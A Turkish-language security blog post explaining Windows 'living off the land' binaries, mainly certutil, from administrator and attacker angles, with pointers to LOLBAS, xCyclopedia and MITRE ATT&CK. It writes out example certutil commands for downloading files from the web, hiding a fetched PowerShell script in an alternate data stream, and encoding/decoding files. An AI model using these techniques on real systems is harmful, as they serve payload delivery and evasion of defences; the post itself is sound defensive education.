LolBin’leri işletim sisteminde önyüklü şekilde gelen (MMC, Bitsadmin, Event Viewer vd.) ve işletim sistemine atanan görevlerin yerine getirilmesi noktasında kullanılan çalıştırılabilir dosyalar olarak adlandırılabilir. Örneğin sistem yöneticisi bir sorunla karşılaştığında, event logları incelemek amacıyla Event Viewer‘ı açarken, saldırgan taraf Event Viewer’ı UAC bypass için kullanmakta. Diğer bir örnek olarak Windows tarafında netsh network interfaceleri yönetmek için kullanılırken, saldırgan tarafın hedefi netsh‘ı kullanarak dosya çalıştırmayı hedeflemesini verebiliriz.
Cisco Talos saldırganların LolBin’leri kullanım amaçlarını dört başlıkta incelemiş:
- Zararlı kodların indirilmesi ve yüklenmesi,
- Zararlı kodların çalıştırılması,
- UAC’nin bypass edilmesi,
- Application Control politikalarının bypass edilmesi.
Bu başlıklara aşağıdaki amaçları da ekleyebiliriz:
- Encode, decode işlemlerinin yapılması (Certutil)
- Alternate Data Streams kullanımı (Cscript)
- Kısmi keşif çalışmaları (Windows Problem Steps Recorder ile ekran kaydı alınması)
LolBin’ler hakkında daha detaylı bilgilere erişmek için bu bağlantıyı kullanabilirsiniz.
Konuyu daha iyi irdelemek için Certutil kullanımını sistem yöneticisi ve saldırgan gözüyle incelemeye başlayalım. Komut satırı uygulaması olan Certutil’in ana görevleri arasında sertifikaların indirilmesi, konfigüre edilmesi yedeklenmesi vb. geliyor. Aşağıdaki komut satırında örnek bir sertikanın Certutil tarafından indirilirken hangi komut satırı parametresi kullanıldığını gözlemleyebilirsiniz.
certutil –split -URL http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crlMicrosoft dijital imzalı ve işletim sistemiyle önyüklü şekilde gelen Certutil elbette saldırganların da hedefinde. Aşağıdaki örnek event logu incelediğimizde Powershell ve Certutil‘in kullanılarak uzak bir sunucudan veri indirilmesine dair logu inceleyelim.
Görüldüğü üzere Certutil kullanılarak sadece belli uzantılı sertifika dosyaları değil farklı dosya çeşitleri de indirilebilmekte. Certutil‘in dijital imzasını ve hash bilgilerini kontrol edelim.
Get-AuthenticodeSignature -FilePath "C:\Windows\system32\certutil.exe" | flAşağıdaki ekran görüntüsünden de görüleceği üzere Certutil, Microsoft tarafından imzalanmış bir işletim sistemi uygulaması…
Certutil’in hash bilgilerini alıp Virustotal’de kontrolleri yapalım.
Virustotal sonuçları (0/71)
Bu aşamadan sonra LolBin incelemeleri için detaylı bilgilerin olduğu hangi kaynakları inceleyebiliriz sorusuna cevap arayalım.
1.Lol-Bas Project
LolBins‘lerin detaylı şekilde sıralalandığı Lol-Bas Project’e bu bağlantıdan erileşebilirsiniz. Örnekleri Certutil‘den verdiğim için Certutil‘den devam edelim. Certutil‘in saldırganlar tarafından Download, ADS, Encode ve Decode işlemleri için kullanıldığını, hangi dosya yolundan çalıştığını ve tespit yöntemlerini aşağıdaki ekran görüntüsünden incelemek mümkün.
Saldırı ve savunma noktasında kullanılabilecek örnek komut satırı parametreleri:
Download:
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
ADS:
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Encode:
certutil -encode inputFileName encodedOutputFileName
Decode:
certutil -decode encodedInputFileName decodedOutputFileName
2. Strontic Github Projesi (xCyclopedia)
Son zamanlarda gördüğüm en başarılı Github repolarından biri olan xCyclopedia, işletim sistemindeki tüm çalıştırılabilir dosyaların bilgilerini çıkarıp JSON veya CSV olarak dışa aktarıyor. İlgili repoya ve scriptlere bu bağlantıdan erişebilirsiniz.
Ayrıca xCyclopedia’ya ait web sitesinden dll ve exe’leri aratıp sonuçlarını inceleyebilirsiniz.
Ayrıntılı sonuçlar:
3. MITRE ATT&CK®
Mitre Attack’a ait software bölümünden LolBins‘lerin kullanım amaçlarını ve hangi saldırgan gruplar tarafından kullanıldığını inceleyebilirsiniz.
Faydalı olması dileğiyle..
CSEC ZONE 